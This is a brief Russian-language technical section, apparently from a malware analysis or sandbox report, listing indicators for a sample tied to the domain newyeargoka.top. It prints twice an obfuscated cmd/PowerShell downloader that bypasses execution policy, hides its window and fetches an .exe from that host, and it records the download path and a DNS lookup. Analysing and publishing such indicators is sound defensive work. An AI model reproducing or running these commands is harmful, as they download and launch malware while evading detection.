Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERS^he^L^l.^eX^E -eXEC^u^ti^o^nPo^l^I^CY ^byP^A^S^s -^nOpRO^FIL^E^ -^W^In^d^owS^tYL^e ^HID^D^En (^n^e^W-oBjecT Sy^STEm.Net.^webCl^Ie^NT)^.^dowNlO^A^DfIle('http://newyeargoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERS^he^L^l.^eX^E -eXEC^u^ti^o^nPo^l^I^CY ^byP^A^S^s -^nOpRO^FIL^E^ -^W^In^d^owS^tYL^e ^HID^D^En (^n^e^W-oBjecT Sy^STEm.Net.^webCl^Ie^NT)^.^dowNlO^A^DfIle('http://newyeargoka...' (со скрытым окном)